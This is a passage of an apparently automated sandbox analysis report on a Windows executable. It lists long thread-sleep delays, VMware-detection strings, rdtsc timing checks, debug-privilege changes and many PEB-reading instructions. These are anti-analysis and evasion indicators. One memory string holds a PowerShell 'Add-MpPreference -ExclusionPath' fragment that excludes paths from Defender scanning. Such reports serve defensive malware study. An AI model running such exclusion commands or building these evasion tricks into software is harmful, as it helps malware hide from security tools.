          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264Thread sleep time: -236109s >= -30000s
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264Thread sleep time: -235797s >= -30000s
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264Thread sleep time: -235468s >= -30000s
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264Thread sleep time: -235355s >= -30000s
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 3200Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\netsh.exe TID: 4624Thread sleep time: -34000s >= -30000s
          Source: C:\Windows\SysWOW64\netsh.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_004088D0 rdtsc
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeThread delayed: delay time: 240000
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeThread delayed: delay time: 239875
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeThread delayed: delay time: 239747
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeThread delayed: delay time: 239639
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeThread delayed: delay time: 239530
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeThread delayed: delay time: 239422
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeThread delayed: delay time: 239296
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeThread delayed: delay time: 239187
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeThread delayed: delay time: 239047
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeThread delayed: delay time: 238919
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeThread delayed: delay time: 238796
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeThread delayed: delay time: 238672
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeThread delayed: delay time: 238562
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeThread delayed: delay time: 238452
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeThread delayed: delay time: 238157
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeThread delayed: delay time: 237500
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeThread delayed: delay time: 237359
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeThread delayed: delay time: 237246
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeThread delayed: delay time: 237139
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeThread delayed: delay time: 237031
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeThread delayed: delay time: 236844
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeThread delayed: delay time: 236344
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeThread delayed: delay time: 236109
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeThread delayed: delay time: 235797
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeThread delayed: delay time: 235468
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeThread delayed: delay time: 235355
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeWindow / User API: threadDelayed 1934
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeWindow / User API: threadDelayed 1406
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeThread delayed: delay time: 240000
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeThread delayed: delay time: 239875
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeThread delayed: delay time: 36459
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeThread delayed: delay time: 239747
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeThread delayed: delay time: 239639
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeThread delayed: delay time: 239530
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeThread delayed: delay time: 239422
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeThread delayed: delay time: 239296
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeThread delayed: delay time: 239187
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeThread delayed: delay time: 239047
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeThread delayed: delay time: 238919
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeThread delayed: delay time: 238796
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeThread delayed: delay time: 238672
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeThread delayed: delay time: 238562
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeThread delayed: delay time: 238452
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeThread delayed: delay time: 238157
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeThread delayed: delay time: 237500
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeThread delayed: delay time: 237359
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeThread delayed: delay time: 237246
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeThread delayed: delay time: 237139
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeThread delayed: delay time: 237031
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeThread delayed: delay time: 236844
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeThread delayed: delay time: 236344
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeThread delayed: delay time: 236109
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeThread delayed: delay time: 235797
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeThread delayed: delay time: 235468
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeThread delayed: delay time: 235355
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeThread delayed: delay time: 922337203685477
          Source: cK1g5gckZR9VHjj.exe, 00000000.00000002.357490796.0000000002C9A000.00000004.00000001.sdmpBinary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
          Source: explorer.exe, 00000005.00000000.389305821.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000005.00000000.389136151.00000000083E0000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: cK1g5gckZR9VHjj.exe, 00000000.00000002.357490796.0000000002C9A000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000005.00000000.384337460.00000000062E0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: cK1g5gckZR9VHjj.exe, 00000000.00000002.357490796.0000000002C9A000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: explorer.exe, 00000005.00000000.389136151.00000000083E0000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000005.00000000.384337460.00000000062E0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.367328151.00000000082E2000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
          Source: explorer.exe, 00000005.00000000.367996285.000000000851A000.00000004.00000001.sdmpBinary or memory string: 00000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}||w)
          Source: explorer.exe, 00000005.00000000.367996285.000000000851A000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Vir
          Source: explorer.exe, 00000005.00000000.367328151.00000000082E2000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 00000005.00000000.389305821.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
          Source: cK1g5gckZR9VHjj.exe, 00000000.00000002.357490796.0000000002C9A000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: explorer.exe, 00000005.00000000.358537483.000000000095C000.00000004.00000020.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
          Source: explorer.exe, 00000005.00000000.407240995.000000000D614000.00000004.00000001.sdmpBinary or memory string: dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}$$w
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_004088D0 rdtsc
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\netsh.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FE58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01004120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01004120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01004120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01004120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01004120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0101513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0101513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0100B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0100B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FE9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0100C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0101A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01012990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010669A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010161A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010161A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010651BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010651BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010651BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010651BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FFB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FFB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FFB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FFB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010741E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01067016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01067016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01067016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010B4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010B4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FEB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FEB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FEB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0101002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0101002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0101002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0101002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0101002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01000050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01000050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010A2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010B1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01063884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01063884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FEB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FEB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FEC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010120A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010120A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010120A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010120A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010120A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010120A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010290AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0101F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0101F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0101F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0107B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0107B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0107B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0107B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0107B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0107B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FE9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FE9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FE9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010A131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FFAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FFAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010B8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FE52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FE52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FE52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FE52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FE52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01013B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01013B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010A138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0109D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0101B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01012397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01014BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01014BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01014BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010B5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FE9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FE9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FE9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FE9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010653CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010653CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FEAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FEAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0100DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FE5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FE5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FE5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FE5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FF8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01003A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01024A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01024A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01074257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010AEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0109B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0109B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010B8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FF1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FF1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0102927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0101D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0101D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FEDB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FEF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0101FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FEDB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01012ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01012AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0106A537 mov eax, dword ptr fs:[00000030h]
